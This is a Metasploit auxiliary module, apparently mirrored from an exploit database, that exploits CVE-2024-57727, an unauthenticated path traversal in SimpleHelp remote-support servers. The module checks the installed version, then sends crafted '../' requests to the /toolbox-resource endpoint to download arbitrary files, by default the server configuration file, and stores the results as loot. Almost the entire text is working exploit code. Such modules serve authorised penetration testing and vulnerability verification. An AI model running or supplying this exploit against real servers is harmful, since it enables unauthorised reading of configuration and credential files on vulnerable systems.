Share
## https://sploitus.com/exploit?id=MSF:AUXILIARY-SCANNER-HTTP-SIMPLEHELP_TOOLBOX_PATH_TRAVERSAL-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SimpleHelp Path Traversal Vulnerability CVE-2024-57727',
'Description' => %q{
There exists a path traversal vulnerability in the /toolbox-resource endpoint that enables unauthenticated
remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
},
'Author' => [
'horizon3ai', # discovery
'imjdl', # CVE-2024-57727 PoC
'jheysel-r7' # module
],
'References' => [
[ 'URL', 'https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/'], # Discovery
[ 'URL', 'https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier'], # Vendor Advisory
[ 'URL', 'https://rustlang.rs/posts/simple-help/'], # PoC for Path Traversal CVE-2024-57727
[ 'URL', 'https://attackerkb.com/topics/G4CTOrbDx0/cve-2024-57727'], # PoC for Path Traversal CVE-2024-57727
[ 'CVE', '2024-57727'],
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2025-01-12',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ IOC_IN_LOGS, ],
'Reliability' => [ ]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to SimpleHelp installation', '/']),
OptString.new('FILEPATH', [true, 'The path to the file to read', 'configuration/serverconfig.xml']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 2 ])
]
)
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'allversions')
)
return Exploit::CheckCode::Unknown('Unable to retrieve SimpleHelp version.') unless res&.body =~ /Visual Version:\s*(\d+\.\d+(?:\.\d+))/
version = Rex::Version.new(Regexp.last_match(1))
# Patched versions are: 5.5.8 or 5.4.10 or 5.3.9
if version.between?(Rex::Version.new('5.5.0'), Rex::Version.new('5.5.7')) ||
version.between?(Rex::Version.new('5.4.0'), Rex::Version.new('5.4.9')) ||
version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('5.3.8'))
return Exploit::CheckCode::Appears("Version detected: #{version}")
end
Exploit::CheckCode::Safe("Version detected: #{version}")
end
def run_host(ip)
directory = %w[alertsdb invitations secmsg toolbox-resources backups sslconfig translations notifications techprefs history recordings templates html remotework toolbox].sample
traverse = '../' * datastore['DEPTH']
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "/toolbox-resource/../#{directory}/#{traverse}/#{datastore['FILEPATH']}")
)
unless res&.code == 200 && res.body.present?
print_error('Nothing was downloaded')
return
end
vprint_line(res.body)
print_good("Downloaded #{res.body.length} bytes")
report_vuln(
host: rhost,
port: rport,
proto: 'tcp',
name: name,
info: 'Module triggered a 200 reply',
refs: references
)
path = store_loot(
'simplehelp.traversal',
'text/plain',
ip,
res.body,
datastore['FILEPATH']
)
print_good("File saved in: #{path}")
end
end